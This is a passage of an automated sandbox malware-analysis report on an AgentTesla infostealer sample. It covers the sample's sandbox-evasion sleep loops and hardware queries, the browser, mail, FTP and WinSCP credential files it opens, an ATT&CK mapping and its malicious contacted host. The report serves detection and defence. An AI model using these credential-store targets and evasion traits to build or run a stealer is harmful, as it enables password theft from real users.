                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199218Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199000Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198890Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198781Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198672Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198562Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198453Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198342Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198234Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198122Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197998Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197890Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197781Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197671Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197562Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197453Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197343Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197234Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197124Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197013Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196905Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196689Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196562Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196453Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196343Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196234Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196125Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196015Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195906Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195796Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195687Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195578Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195468Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195359Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195250Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195140Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195031Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194921Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194812Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194703Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194592Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194483Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194375Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWindow / User API: threadDelayed 1940Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWindow / User API: threadDelayed 7918Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1200000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 5720Thread sleep count: 1940 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199871s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 5720Thread sleep count: 7918 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199762s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199463s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199348s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1199000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198342s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1198122s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197998s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197124s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1197013s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196905s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196689s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1196015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195796s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1195031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1194921s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1194812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1194703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1194592s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1194483s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exe TID: 6664Thread sleep time: -1194375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199871Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199762Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199463Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199348Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199218Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199000Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198890Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198781Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198672Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198562Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198453Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198342Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198234Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1198122Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197998Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197890Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197781Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197671Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197562Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197453Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197343Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197234Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197124Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1197013Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196905Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196689Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196562Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196453Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196343Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196234Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196125Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1196015Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195906Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195796Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195687Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195578Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195468Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195359Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195250Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195140Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1195031Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194921Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194812Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194703Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194592Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194483Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1194375Jump to behavior
                      Source: pE7icjUisS.exe, 00000000.00000002.3855637535.00000000011BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeQueries volume information: C:\Users\user\Desktop\pE7icjUisS.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: pE7icjUisS.exe, type: SAMPLE
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pE7icjUisS.exe PID: 996, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: pE7icjUisS.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pE7icjUisS.exe PID: 996, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: pE7icjUisS.exe, type: SAMPLE
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: pE7icjUisS.exe PID: 996, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		111
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		1
                      Exfiltration Over Alternative Protocol                      		Abuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts141
                      Virtualization/Sandbox Evasion                      		21
                      Input Capture                      		1
                      Process Discovery                      		Remote Desktop Protocol21
                      Input Capture                      		1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Deobfuscate/Decode Files or Information                      		1
                      Credentials in Registry                      		141
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares11
                      Archive Collected Data                      		1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Obfuscated Files or Information                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object Model2
                      Data from Local System                      		11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      File and Directory Discovery                      		SSH1
                      Clipboard Data                      		Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials24
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      pE7icjUisS.exe82%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      pE7icjUisS.exe100%AviraHEUR/AGEN.1305739
                      pE7icjUisS.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ftp.normagroup.com.tr100%Avira URL Cloudphishing

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ftp.normagroup.com.tr
                      		104.247.165.99
                      		truetrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ftp.normagroup.com.trpE7icjUisS.exe, 00000000.00000002.3856454499.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        		unknown
                        https://account.dyn.com/pE7icjUisS.exefalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            104.247.165.99
                            		ftp.normagroup.com.trUnited States
                            		8100ASN-QUADRANET-GLOBALUStrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1567461
                            Start date and time:2024-12-03 15:56:00 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 51s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:pE7icjUisS.exe
                            renamed because original name is a hash value
                            Original Sample Name:fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 53
                            • Number of non-executed functions: 7
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: pE7icjUisS.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            09:57:17API Interceptor10930208x Sleep call for process: pE7icjUisS.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.247.165.99hesaphareket.exeGet hashmaliciousAgentTeslaBrowse
                              wKmhzHd4MC.exeGet hashmaliciousAgentTeslaBrowse
                                hesaphareketi__20241001.exeGet hashmaliciousAgentTeslaBrowse
                                  EUR Swift Bildirimi12-08-2024.exeGet hashmaliciousAgentTeslaBrowse
                                    LisectAVT_2403002A_134.exeGet hashmaliciousAgentTeslaBrowse
                                      hesaphareketi_____.exeGet hashmaliciousAgentTeslaBrowse
                                        hesaphareketi__.exeGet hashmaliciousAgentTeslaBrowse
                                          hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                            hesaphareketi-.exeGet hashmaliciousAgentTeslaBrowse
                                              hesaphareketi-01-pdf.exeGet hashmaliciousAgentTeslaBrowse

                                                Domains

